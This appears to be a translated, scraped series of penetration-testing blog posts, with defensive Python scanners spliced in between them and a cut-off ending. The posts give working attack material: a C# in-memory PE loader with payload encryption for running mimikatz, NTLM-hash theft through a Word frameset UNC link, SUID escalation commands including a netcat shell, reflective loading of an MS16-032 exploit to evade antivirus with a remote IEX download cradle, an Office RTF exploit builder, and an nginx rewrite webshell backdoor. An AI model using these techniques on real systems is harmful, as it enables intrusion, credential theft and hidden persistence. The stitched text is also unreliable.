            public IMAGE_OPTIONAL_HEADER64 OptionalHeader64
            {
                get
                {
                    return optionalHeader64;
                }
            }
    
            public IMAGE_SECTION_HEADER[] ImageSectionHeaders
            {
                get
                {
                    return imageSectionHeaders;
                }
            }
    
            public byte[] RawBytes
            {
                get
                {
                    return rawbytes;
                }
    
            }
    
        }//End Class
    
    
        unsafe class NativeDeclarations
        {
    
            public static uint MEM_COMMIT = 0x1000;
            public static uint MEM_RESERVE = 0x2000;
            public static uint PAGE_EXECUTE_READWRITE = 0x40;
            public static uint PAGE_READWRITE = 0x04;
    
            [StructLayout(LayoutKind.Sequential)]
            public unsafe struct IMAGE_BASE_RELOCATION
            {
                public uint VirtualAdress;
                public uint SizeOfBlock;
            }
    
            [DllImport("kernel32")]
            public static extern IntPtr VirtualAlloc(IntPtr lpStartAddr, uint size, uint flAllocationType, uint flProtect);
    
            [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
            public static extern IntPtr LoadLibrary(string lpFileName);
    
            [DllImport("kernel32.dll", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
            public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    
            [DllImport("kernel32")]
            public static extern IntPtr CreateThread(
    
              IntPtr lpThreadAttributes,
              uint dwStackSize,
              IntPtr lpStartAddress,
              IntPtr param,
              uint dwCreationFlags,
              IntPtr lpThreadId
              );
    
            [DllImport("kernel32")]
            public static extern UInt32 WaitForSingleObject(
    
              IntPtr hHandle,
              UInt32 dwMilliseconds
              );
    
            [StructLayout(LayoutKind.Sequential)]
            public unsafe struct IMAGE_IMPORT_DESCRIPTOR
            {
                public uint OriginalFirstThunk;
                public uint TimeDateStamp;
                public uint ForwarderChain;
                public uint Name;
                public uint FirstThunk;
            }
    
    
        }
    
        public class Misc
        {
            //Change This!
            private static readonly byte[] SALT = new byte[] { 0xba, 0xdc, 0x0f, 0xfe, 0xeb, 0xad, 0xbe, 0xfd, 0xea, 0xdb, 0xab, 0xef, 0xac, 0xe8, 0xac, 0xdc };
    
            public static void Stage(string fileName, string Key, string outFile)
            {
    
                byte[] raw = FileToByteArray(fileName);
                byte[] file = Encrypt(raw, Key);
    
                using (FileStream fileStream = File.Create(outFile))
                {
                    fileStream.Write(file, 0, file.Length); // write the encrypted payload to the output file
                }
    
                //Console.WriteLine("File Ready, Now Deliver Payload");
            }
    
            public static byte[] FileToByteArray(string _FileName)
            {
                byte[] _Buffer = null;
                System.IO.FileStream _FileStream = new System.IO.FileStream(_FileName, System.IO.FileMode.Open, System.IO.FileAccess.Read);
                System.IO.BinaryReader _BinaryReader = new System.IO.BinaryReader(_FileStream);
                long _TotalBytes = new System.IO.FileInfo(_FileName).Length;
                _Buffer = _BinaryReader.ReadBytes((Int32)_TotalBytes);
                _FileStream.Close();
                _FileStream.Dispose();
                _BinaryReader.Close();
                return _Buffer;
            }
    
            public static byte[] Encrypt(byte[] plain, string password)
            {
                MemoryStream memoryStream;
                CryptoStream cryptoStream;
                Rijndael rijndael = Rijndael.Create();
                Rfc2898DeriveBytes pdb = new Rfc2898DeriveBytes(password, SALT);
                rijndael.Key = pdb.GetBytes(32);
                rijndael.IV = pdb.GetBytes(16);
                memoryStream = new MemoryStream();
                cryptoStream = new CryptoStream(memoryStream, rijndael.CreateEncryptor(), CryptoStreamMode.Write);
                cryptoStream.Write(plain, 0, plain.Length);
                cryptoStream.Close();
                return memoryStream.ToArray();
            }
            public static byte[] Decrypt(byte[] cipher, string password)
            {
                MemoryStream memoryStream;
                CryptoStream cryptoStream;
                Rijndael rijndael = Rijndael.Create();
                Rfc2898DeriveBytes pdb = new Rfc2898DeriveBytes(password, SALT);
                rijndael.Key = pdb.GetBytes(32);
                rijndael.IV = pdb.GetBytes(16);
                memoryStream = new MemoryStream();
                cryptoStream = new CryptoStream(memoryStream, rijndael.CreateDecryptor(), CryptoStreamMode.Write);
                cryptoStream.Write(cipher, 0, cipher.Length);
                cryptoStream.Close();
                return memoryStream.ToArray();
            }
    
            public static byte[] ReadFully(Stream input) //Returns Byte Array From Stream
            {
                byte[] buffer = new byte[16 * 1024];
                using (MemoryStream ms = new MemoryStream())
                {
                    int read;
                    while ((read = input.Read(buffer, 0, buffer.Length)) > 0)
                    {
                        ms.Write(buffer, 0, read);
                    }
                    return ms.ToArray();
                }
            }
    
        }//End Misc Class
    
        public class Package
        {
            public static string filex86 = @"INSERT B64 HERE";
            public static string filex64 = @"INSERT B64 HERE";
    
        }
    }
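
As an added illustration (not part of the original post or of subtee's loader), the following Python reads the same header fields that the PELoader class above parses: the DOS header's e_lfanew, the PE signature, IMAGE_FILE_HEADER and the section table. It also cross-checks the IMAGE_FILE_32BIT_MACHINE characteristics flag that Is32BitHeader relies on against the optional header magic, because a loader should reject an image where the two disagree rather than guess. The sample image is constructed inline and contains headers only; it is not an executable.

```python
import struct
from dataclasses import dataclass, field
from typing import List

IMAGE_DOS_SIGNATURE = 0x5A4D        # "MZ"
IMAGE_NT_SIGNATURE = 0x00004550     # "PE\0\0"
IMAGE_FILE_32BIT_MACHINE = 0x0100   # Characteristics flag tested by Is32BitHeader above
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B


@dataclass
class SectionHeader:
    name: str
    virtual_size: int
    virtual_address: int
    size_of_raw_data: int
    pointer_to_raw_data: int
    characteristics: int


@dataclass
class PEHeaders:
    machine: int
    number_of_sections: int
    characteristics: int
    optional_magic: int
    is_32bit: bool
    sections: List[SectionHeader] = field(default_factory=list)


def is_pe(data: bytes) -> bool:
    """Cheap MZ/PE signature check with bounds checks, done before any further parsing."""
    if len(data) < 0x40 or struct.unpack_from("<H", data, 0)[0] != IMAGE_DOS_SIGNATURE:
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return e_lfanew + 24 <= len(data) and struct.unpack_from("<I", data, e_lfanew)[0] == IMAGE_NT_SIGNATURE


def parse_pe_headers(data: bytes) -> PEHeaders:
    """DOS header -> NT signature -> IMAGE_FILE_HEADER -> section table, every read bounds-checked."""
    if not is_pe(data):
        raise ValueError("not a PE image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    # IMAGE_FILE_HEADER (20 bytes) directly follows the 4-byte "PE\0\0" signature
    machine, nsec, _stamp, _symptr, _nsyms, opt_size, chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt_off = e_lfanew + 24
    magic = struct.unpack_from("<H", data, opt_off)[0] if opt_size >= 2 and opt_off + 2 <= len(data) else 0
    flag_32 = bool(chars & IMAGE_FILE_32BIT_MACHINE)
    if magic in (PE32_MAGIC, PE32PLUS_MAGIC) and flag_32 != (magic == PE32_MAGIC):
        raise ValueError("32-bit characteristics flag disagrees with optional header magic")
    sections = []
    sec_off = opt_off + opt_size
    for i in range(nsec):
        off = sec_off + i * 40                       # IMAGE_SECTION_HEADER is 40 bytes
        if off + 40 > len(data):
            raise ValueError("section table runs past end of image")
        (name, vsize, vaddr, rawsize, rawptr,
         _relptr, _linptr, _nrel, _nlin, sflags) = struct.unpack_from("<8sIIIIIIHHI", data, off)
        sections.append(SectionHeader(name.rstrip(b"\0").decode("ascii", "replace"),
                                      vsize, vaddr, rawsize, rawptr, sflags))
    return PEHeaders(machine, nsec, chars, magic, flag_32, sections)


def build_sample_pe(bit32: bool = True) -> bytes:
    """Constructed sample: MZ stub, PE signature, file header, a 2-byte optional header holding
    only the magic, and two section headers. Headers only; it cannot execute."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)            # e_lfanew = 0x40
    chars = 0x0002 | (IMAGE_FILE_32BIT_MACHINE if bit32 else 0)   # EXECUTABLE_IMAGE [| 32BIT_MACHINE]
    opt = struct.pack("<H", PE32_MAGIC if bit32 else PE32PLUS_MAGIC)
    file_hdr = struct.pack("<HHIIIHH", 0x014C if bit32 else 0x8664, 2, 0, 0, 0, len(opt), chars)
    text = struct.pack("<8sIIIIIIHHI", b".text", 0x100, 0x1000, 0x200, 0x400, 0, 0, 0, 0, 0x60000020)
    data = struct.pack("<8sIIIIIIHHI", b".data", 0x100, 0x2000, 0x200, 0x600, 0, 0, 0, 0, 0xC0000040)
    return dos + b"PE\0\0" + file_hdr + opt + text + data


if __name__ == "__main__":
    hdr = parse_pe_headers(build_sample_pe())
    print(hdr.is_32bit, hex(hdr.optional_magic), [s.name for s in hdr.sections])
```

The C# loader reads `Is32BitHeader` from the characteristics flag alone and then picks which optional-header struct to marshal; the Python version shows why checking the magic too is cheap insurance against a crafted header.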
    

    Next, compile the .cs file. First generate key.snk:

    $key = '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'
    $Content = [System.Convert]::FromBase64String($key)
    Set-Content key.snk -Value $Content -Encoding Byte
    

    Compile the exe:

    C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /r:System.EnterpriseServices.dll /out:katz.exe /keyfile:key.snk /unsafe katz.cs
    

    After compiling, it can be run directly, or via regsvcs.exe, regasm.exe or InstallUtil.exe.

    1513688421587.png



    Someone previously summarised many ways of stealing NTLM hashes (original article, Chinese translation). That write-up already covers a lot of methods; I recently learned another one, so I am sharing it here as a supplement.

    Historically, Microsoft Word has been used as an HTML editor. This means it supports HTML elements such as framesets. A Word document can therefore be linked to a UNC path and, combined with Responder, used to capture NTLM hashes from outside. A Word document with the docx extension is actually a zip file containing various XML documents, which control the theme, fonts, document settings and web settings.

    So we can create any new document and open it with an archive tool.

    1513736341443.png

    The word directory contains a webSettings.xml. We modify this file; adding the following code creates a link to another file.

    <w:frameset>
    <w:framesetSplitbar>
    <w:w w:val="60"/>
    <w:color w:val="auto"/>
    <w:noBorder/>
    </w:framesetSplitbar>
    <w:frameset>
    <w:frame>
    <w:name w:val="3"/>
    <w:sourceFileName r:id="rId1"/>
    <w:linkedToFile/>
    </w:frame>
    </w:frameset>
    </w:frameset>
    

    The final modified webSettings.xml looks like this:

    <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
    <w:webSettings xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" mc:Ignorable="w14">
        <w:frameset>
    <w:framesetSplitbar>
    <w:w w:val="60"/>
    <w:color w:val="auto"/>
    <w:noBorder/>
    </w:framesetSplitbar>
    <w:frameset>
    <w:frame>
    <w:name w:val="3"/>
    <w:sourceFileName r:id="rId1"/>
    <w:linkedToFile/>
    </w:frame>
    </w:frameset>
    </w:frameset>
    <w:optimizeForBrowser/><w:allowPNG/></w:webSettings>
    

    Now replace the original webSettings.xml with the new one, then create a new file webSettings.xml.rels in the _rels directory under word, with the following content:

    <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
    <Relationships
    xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
    <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame" Target="\\172.16.103.130\Updates.docx" TargetMode="External"/>
    </Relationships>
    

    This contains the UNC path, pointing at our Responder.

    Then rename the document back to .docx and start Responder:

    python Responder.py -I eth0 -wrf
    

    Opening the document in Word yields the hash:

    1513737175195.png

    Of course, DDE, CVE-2017-0199 and other methods work as well.
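
From the defender's side, the package structure described above is exactly what makes this detectable before the file is opened: the frame relationship and its external UNC target are plain XML inside the zip. The following scanner is an added example (not from the original post); it inspects every .rels part of a .docx, flags external frame relationships and any target that is a UNC or file: path, and builds a constructed minimal package containing the webSettings.xml/.rels pair shown above for the test (the target host is made up).

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from typing import List

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
FRAME_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame"
# \\host\share, //host/share or file:// targets all trigger an SMB/WebDAV connection when resolved
UNC_OR_FILE = re.compile(r"^(\\\\|//|file:)", re.IGNORECASE)


def scan_docx(docx_bytes: bytes) -> List[str]:
    """One finding per external relationship that is a frame link or points at a UNC/file path.
    Every .rels part is inspected, not only word/_rels/webSettings.xml.rels."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        names = set(zf.namelist())
        has_frameset = False
        if "word/webSettings.xml" in names:
            root = ET.fromstring(zf.read("word/webSettings.xml"))
            has_frameset = root.find(f"{{{W_NS}}}frameset") is not None
        for name in sorted(names):
            if not name.endswith(".rels"):
                continue
            for rel in ET.fromstring(zf.read(name)).iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode", "").lower() != "external":
                    continue
                target, rtype = rel.get("Target", ""), rel.get("Type", "")
                reasons = []
                if rtype == FRAME_TYPE:
                    reasons.append("frame relationship" + (" backed by a frameset" if has_frameset else ""))
                if UNC_OR_FILE.match(target):
                    reasons.append("UNC/file target")
                if reasons:
                    findings.append(f"{name}: {target} ({'; '.join(reasons)})")
    return findings


# webSettings.xml with the frameset from the post (whitespace collapsed)
WEB_SETTINGS_WITH_FRAME = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    f'<w:webSettings xmlns:w="{W_NS}" '
    'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
    '<w:frameset><w:frameset><w:frame><w:name w:val="3"/><w:sourceFileName r:id="rId1"/>'
    '<w:linkedToFile/></w:frame></w:frameset></w:frameset></w:webSettings>'
)


def build_sample_docx(target: str, with_frame: bool = True) -> bytes:
    """Constructed minimal package: a benign external hyperlink relationship plus, optionally,
    the webSettings.xml/.rels pair from the post. Not a complete Word document."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(
            "word/_rels/document.xml.rels",
            f'<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="{REL_NS}">'
            '<Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" '
            'Target="https://example.com/" TargetMode="External"/></Relationships>')
        if with_frame:
            zf.writestr("word/webSettings.xml", WEB_SETTINGS_WITH_FRAME)
            zf.writestr(
                "word/_rels/webSettings.xml.rels",
                f'<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="{REL_NS}">'
                f'<Relationship Id="rId1" Type="{FRAME_TYPE}" Target="{target}" TargetMode="External"/>'
                '</Relationships>')
    return buf.getvalue()


if __name__ == "__main__":
    for line in scan_docx(build_sample_docx("\\\\10.0.0.5\\share\\Updates.docx")):
        print(line)
```

An ordinary hyperlink to an https URL is external too but is not reported, so the check stays quiet on normal documents; a frame to an https host is reported because Word will fetch it on open.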


  • 12/19/17--19:49: SUID Privilege Escalation (chan 69772723)
    In Linux privilege escalation, SUID files can be used to escalate privileges. The purpose of SUID is to let a user who does not have the corresponding permissions access resources they otherwise could not when running the program. The following commands are commonly used to find files with the SUID bit set:

    find / -user root -perm -4000 -print 2>/dev/null
    find / -perm -u=s -type f 2>/dev/null
    find / -user root -perm -4000 -exec ls -ldb {} \;
    

    For example nmap:

    ls -l /usr/bin/nmap
    -rwsr-xr-x 1 root root 780676 2008-04-08 10:04 /usr/bin/nmap
    

    The s means the SUID bit is set and the file executes with root privileges. Below is a summary of several kinds of files that can be used for privilege escalation:

    1.Nmap

    Old versions of nmap (2.02-5.21) have an interactive mode that allows the user to execute system commands. Escalation:

    nmap --interactive
    

    Then run:

    nmap> !sh
    sh-3.2# whoami
    root
    

    The corresponding Metasploit module is:

    exploit/unix/local/setuid_nmap
    

    2.Find

    touch test
    find test -exec whoami \;
    

    If nc is installed on the server, the following command can be used to listen directly:

    find test -exec netcat -lvp 5555 -e /bin/sh \;
    

    Then connect:

    netcat 192.168.1.100 5555
    

    This yields a root shell.

    3.vim/vi

    Open vim, press ESC and enter:

    :set shell=/bin/sh
    :shell
    

    Commands can then be executed.

    4.bash

    bash -p
    bash-3.2# id
    uid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)
    

    5.less

    less /etc/passwd
    !/bin/sh
    

    6.more

    more /home/pelle/myfile
    !/bin/bash
    

    7.cp

    Use cp to overwrite /etc/shadow.

    8.mv

    Use mv to overwrite /etc/shadow or /etc/sudoers.

    9.awk

    awk 'BEGIN {system("/bin/bash")}'
    

    10.man

    man passwd
    !/bin/bash
    

    11.python/perl/ruby/lua/etc

    perl

    exec "/bin/bash";
    

    python

    import os
    os.system("/bin/bash")
    

    12.tcpdump

    echo $'id\ncat /etc/shadow' > /tmp/.test
    chmod +x /tmp/.test
    sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
    

    Additions welcome.
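
The same list reads as an audit policy: a setuid-root copy of any program above is a finding, and so is a setuid-root binary that non-root users can write to. The following Python is an added example (not part of the original post) that does what the find commands at the top of the post do, then applies that policy. It runs on a constructed inventory of (path, st_mode, st_uid) records so it can be tested offline; `collect()` builds the same records from a real filesystem, staying on one device like `find -xdev`.

```python
import os
import stat
from typing import Iterable, List, NamedTuple

# Programs from the list above that give a shell or an arbitrary file write when run setuid root
SHELL_ESCAPE_BINARIES = {
    "nmap", "find", "vim", "vi", "bash", "sh", "less", "more", "cp", "mv", "awk", "gawk",
    "man", "python", "perl", "ruby", "lua", "tcpdump",
}


class FileRecord(NamedTuple):
    path: str
    mode: int   # st_mode as returned by os.lstat (type bits plus permission bits)
    uid: int    # st_uid


class Finding(NamedTuple):
    path: str
    reason: str


def is_setuid_root(rec: FileRecord) -> bool:
    """Equivalent of 'find / -user root -perm -4000 -type f'."""
    return stat.S_ISREG(rec.mode) and bool(rec.mode & stat.S_ISUID) and rec.uid == 0


def program_family(path: str) -> str:
    """python3.6 -> python, perl5.30 -> perl, lua5.3 -> lua: strip a trailing version number."""
    return os.path.basename(path).rstrip("0123456789.")


def audit(records: Iterable[FileRecord]) -> List[Finding]:
    """Apply the policy to every setuid-root regular file in the inventory."""
    findings = []
    for rec in records:
        if not is_setuid_root(rec):
            continue
        if program_family(rec.path) in SHELL_ESCAPE_BINARIES:
            findings.append(Finding(rec.path, "setuid root and known to offer a shell escape"))
        elif rec.mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append(Finding(rec.path, "setuid root and writable by group or others"))
    return findings


def _same_device(path: str, dev: int) -> bool:
    try:
        return os.lstat(path).st_dev == dev
    except OSError:
        return False


def collect(root: str = "/") -> List[FileRecord]:
    """Walk one filesystem and return a record per regular file (errors are skipped, not raised)."""
    records: List[FileRecord] = []
    try:
        root_dev = os.lstat(root).st_dev
    except OSError:
        return records
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        # prune mount points so /proc, /sys and network mounts are not walked
        dirnames[:] = [d for d in dirnames if _same_device(os.path.join(dirpath, d), root_dev)]
        for f in filenames:
            p = os.path.join(dirpath, f)
            try:
                st = os.lstat(p)
            except OSError:
                continue
            records.append(FileRecord(p, st.st_mode, st.st_uid))
    return records


# Constructed sample inventory, not taken from a real host
SAMPLE_RECORDS = [
    FileRecord("/usr/bin/nmap", stat.S_IFREG | 0o4755, 0),
    FileRecord("/usr/bin/passwd", stat.S_IFREG | 0o4755, 0),       # setuid root by design, not listed
    FileRecord("/usr/bin/find", stat.S_IFREG | 0o755, 0),          # not setuid
    FileRecord("/usr/local/bin/python3.6", stat.S_IFREG | 0o4755, 0),
    FileRecord("/opt/helper", stat.S_IFREG | 0o4777, 0),           # setuid root and world-writable
    FileRecord("/home/dev/vim", stat.S_IFREG | 0o4755, 1000),      # setuid, but not root
]

if __name__ == "__main__":
    for f in audit(SAMPLE_RECORDS):
        print(f.path, "-", f.reason)
```

Run `audit(collect("/"))` as root for a real host; the watch-list is the one from this post and should be extended with whatever interpreters and pagers the host actually ships.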



    Sometimes, when using an exploit for privilege escalation, the exploit may be detected and removed by AV. If we have the source, we can modify it to evade detection, but today I introduce another method: using a PE loader to load the exploit.
    The PowerShell PE loader is here; looking at its code, the script is very simple to use:

    $PEBytes = [IO.File]::ReadAllBytes('DemoEXE.exe')
    Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "Arg1 Arg2 Arg3 Arg4"
    

    It takes the exploit's bytes and loads the exploit in memory, so the idea is simple: convert the exploit we need into a string, write it into the script, and we have a self-contained PowerShell script.

    Here is a script that makes the conversion convenient:

    function Convert-BinaryToString {
       [CmdletBinding()] param (
          [string] $FilePath
       )
       try {
          $ByteArray = [System.IO.File]::ReadAllBytes($FilePath);
       }
       catch {
          throw "Failed to read file. Ensure that you have permission to the file, and that the file path is correct.";
       }
       if ($ByteArray) {
          $Base64String = [System.Convert]::ToBase64String($ByteArray);
       }
       else {
          throw '$ByteArray is $null.';
       }
       $Base64String | set-content ("b64.txt")
    }
    

    I use zcgonvh's MS16-032 as a demonstration. Convert it with the script:

    PS C:\Users\evi1cg\Desktop\16_032> . .\Convert-BinaryToString.ps1
    PS C:\Users\evi1cg\Desktop\16_032> Convert-BinaryToString -FilePath .\ms16-032_x64.exe
    

    The base64 string is generated and stored in b64.txt.
    4B544212-75E6-4CAD-839C-18F77CA759EA.png

    Convert it back with the following commands:

    $InputString = "base64string"
    $PEBytes = [System.Convert]::FromBase64String($InputString)
    

    Then

    Invoke-ReflectivePEInjection -PEBytes $PEBytes
    

    can be used to load it. Finally, the complete script:

    E2P_MS16-032.ps1

    Usage:

    E2P_MS16-032 -Command '"net user"'
    

    photo_2017-12-27_20-07-13.jpg

    Script on GitHub:

    Remote loading command:

    powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/E2P_MS16-032.ps1');E2P_MS16-032 -Command '\"whoami\"'"
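
The loader pattern shown above (a base64 string decoded with `FromBase64String` and handed to `Invoke-ReflectivePEInjection`) is also a clean detection opportunity: the script has to carry the whole PE image in base64, and a PE image starts with an MZ header that points at a PE signature. The following Python is an added example (not from the original post) that decodes every long base64 run in a script and reports the ones that decode to a PE image, with the machine type from the file header. The sample script is constructed inline around a 256-byte header-only image that cannot execute.

```python
import base64
import binascii
import re
import struct
from typing import List, NamedTuple


class EmbeddedPE(NamedTuple):
    offset: int      # where the base64 run starts in the script text
    size: int        # decoded size in bytes
    machine: int     # IMAGE_FILE_HEADER.Machine (0x14C = x86, 0x8664 = x64)


# A run of base64 alphabet long enough to hold at least a few hundred bytes of payload
B64_RUN = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")


def looks_like_pe(blob: bytes) -> bool:
    """MZ at offset 0 and 'PE\\0\\0' at e_lfanew, with bounds checks."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    return e_lfanew + 24 <= len(blob) and blob[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def find_embedded_pe(script: str) -> List[EmbeddedPE]:
    """Decode every long base64 run in a script and report the ones that decode to a PE image."""
    hits = []
    for m in B64_RUN.finditer(script):
        run = m.group(0)
        run += "=" * (-len(run) % 4)            # tolerate missing trailing padding
        try:
            blob = base64.b64decode(run, validate=True)
        except (binascii.Error, ValueError):
            continue
        if looks_like_pe(blob):
            e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
            machine = struct.unpack_from("<H", blob, e_lfanew + 4)[0]
            hits.append(EmbeddedPE(m.start(), len(blob), machine))
    return hits


def build_sample_script() -> str:
    """Constructed sample in the shape of the loader script above: a 256-byte header-only PE
    (not executable) as base64, plus a long base64 text string that must not be flagged."""
    header = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40) + b"PE\0\0"
    header += struct.pack("<HHIIIHH", 0x8664, 0, 0, 0, 0, 0, 0x22)   # x64 file header, no sections
    fake_pe = header + b"\0" * (256 - len(header))
    benign = base64.b64encode(b"just a long configuration string, nothing executable here. " * 5).decode()
    return (
        f'$InputString = "{base64.b64encode(fake_pe).decode()}"\n'
        "$PEBytes = [System.Convert]::FromBase64String($InputString)\n"
        f'$Banner = "{benign}"\n'
        "Invoke-ReflectivePEInjection -PEBytes $PEBytes\n"
    )


if __name__ == "__main__":
    for hit in find_embedded_pe(build_sample_script()):
        print(f"PE image at text offset {hit.offset}: {hit.size} bytes, machine=0x{hit.machine:X}")
```

The regex only sees a single unbroken run, so a script that splits the string across lines or builds it with `-join` needs the fragments concatenated first; scripts that pass the payload through `-EncodedCommand` (UTF-16 base64) need a second decode before the MZ check.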
    

    717403C9-86AA-4594-A35F-9D0A1307088C.png


  • 01/12/18--03:41: CVE-2018-0802利用 (chan 69772723)
    After CVE-2017-11882, January 2018 brought a new "Nightmare Formula II". The in-the-wild sample embedded two Equation objects, exploiting an N-day and a 0-day at the same time: the N-day attacks unpatched systems, while the 0-day attacks fully patched systems by bypassing the ASLR (address randomisation) protection added by the CVE-2017-11882 patch; the attack ultimately implants a malicious remote-control program on the user's computer. For an analysis of the vulnerability see here. Today I saw an exploit script for CVE-2018-0802 published on GitHub (here), so to get the most complete exploitation I wrote RTF_11882_0802.

    GitHub:
    This script combines both Equation Editor exploits.

    Usage is the same as before:

    python RTF_11882_0802.py -c "cmd.exe /c calc.exe"  -i test.rtf -o test.doc
    

    It simply inserts two Equation Editor objects into the document, one for 11882 and one for 0802.

    The 0-day used by "Nightmare Formula II" (CVE-2018-0802) can be called the twin of CVE-2017-11882. One vulnerability in the attack sample targets unpatched systems, the other targets patched systems, and the two OLE objects attack together, so the carefully constructed attack works regardless of the patch state. Both the exploitation technique and the ASLR bypass depend on coincidences: if there were no suitable ret instruction inside the EQNEDT32.EXE module to bypass ASLR, if lpLogFont were not the first parameter of sub_21774, or if the CVE-2017-11882 patch had forced DEP on, "Nightmare Formula II" would have had no opening.

    Mitigations

    1. Install the patch promptly

    Patch download:

    https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802

    2. Disable the module via the registry: as a mitigation, the following COM control can be disabled by editing the registry, where XX.X is the Office version number.

    Run:

    reg add "HKLM\SOFTWARE\Microsoft\Office\XX.X\Common\COMCompatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400
    
    reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\XX.X\Common\COMCompatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400
    

    Note: this script is for security research only; do not use it illegally! This site accepts no responsibility for any legal issues or consequences arising from its use.


  • 03/07/18--22:26: Hack with rewrite (chan 69772723)
    0x00 Introduction

    Everyone knows that Apache, nginx and others have a rewrite feature. Rewrite rules transform an input URL into another URL, a common need that makes URLs cleaner. But the feature can also be used for other purposes, which I briefly introduce below.

    0x01 Backdoors

    Backdoors built from configuration files have been covered in many articles, namely .htaccess and .user.ini backdoors (for .htaccess backdoors see here; P牛 also published an article on .user.ini backdoors, see here; and there is 柠檬师傅's php.ini backdoor). So what does this have to do with rewrite? Rewrite is mainly used here to evade log review: with a rewrite rule we can execute our webshell by requesting a file with an image extension, although modifying these configuration files requires a certain level of privilege. A brief introduction follows. I tested mainly with nginx, so I describe nginx; for the Apache configuration, look it up yourself if interested. Here is my configuration:
    nginx.conf

    worker_processes  1;
    events {
        worker_connections  1024;
    }
    http {
        include       mime.types;
        default_type  application/octet-stream;
        sendfile        on;
        keepalive_timeout  65;
        include /usr/local/nginx/vhosts/*.conf;
        server {
            listen       80;
            server_name  localhost;
            location / {
                root   html;
                index  index.html index.htm;
            }
            error_page   500 502 503 504  /50x.html;
            location = /50x.html {
                root   html;
            }
        }
    }
    

    Multiple domains are configured, so the per-domain configuration lives in vhosts. The configuration file for the domain in question is mydomain.conf:

    server {
        listen 80;
        server_name  mydomain.com;
        root /www/mydomain;
        index index.html index.php;
        if ( $query_string ~* ".*[\;'\<\>].*" ){
            return 404;
        }
        location ~ .*\.(gif|jpg|jpeg|bmp|png|swf|flv|ico)$ {
            expires 30d;
        }
    
        location ~ .*\.(js|css)?$ {
            expires 7d;
        }
        location ~ \.php$ {
            fastcgi_pass   127.0.0.1:9000;
            fastcgi_index  index.php;
    
            include        fastcgi_params;
            # set PATH_INFO and rewrite the SCRIPT_FILENAME and SCRIPT_NAME server variables
            set $fastcgi_script_name2 $fastcgi_script_name;
            if ($fastcgi_script_name ~ "^(.+\.php)(/.+)$") {
                set $fastcgi_script_name2 $1;
                set $path_info $2;
            }
            fastcgi_param   PATH_INFO $path_info;
            fastcgi_param   SCRIPT_FILENAME   $document_root$fastcgi_script_name2;
            fastcgi_param   SCRIPT_NAME   $fastcgi_script_name2;
        }
    }
    

    Configuring the rewrite is simple; just add:

        location ~ \.png$ {
            rewrite ^/img/test\.png$ /img/test.php last;
        }
    

    This matches URLs ending in png; if img/test.png matches, it is rewritten to img/test.php. So we only need to place test.php in the img directory and can reach it by requesting http://domain.com/img/test.png, as shown below:
    1520482949500.png

    For more matching rules, see this article.

    After configuring, the nginx service needs to be restarted.
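
Because the rule has to live in the server configuration, the configuration is where it can be caught. The following Python is an added example (not part of the original post) that pulls every `rewrite` directive out of an nginx config and reports those that turn a static-looking URL (an image, script or stylesheet extension) into a server-side script, which is precisely the disguise described above. The sample config is constructed from the vhost in this post plus two ordinary rewrites that must not be reported.

```python
import re
from typing import List, NamedTuple, Set

# Extensions the vhost above serves as cacheable static content
STATIC_EXT = {"gif", "jpg", "jpeg", "bmp", "png", "swf", "flv", "ico", "js", "css"}
# Extensions that reach an interpreter (fastcgi_pass and friends)
SCRIPT_EXT = {"php", "phtml", "php5", "jsp", "asp", "aspx", "cgi", "pl"}


class RewriteRule(NamedTuple):
    line: int
    pattern: str
    target: str
    flag: str


REWRITE_RE = re.compile(r"^\s*rewrite\s+(\S+)\s+(\S+)(?:\s+(last|break|redirect|permanent))?\s*;")


def parse_rewrites(conf: str) -> List[RewriteRule]:
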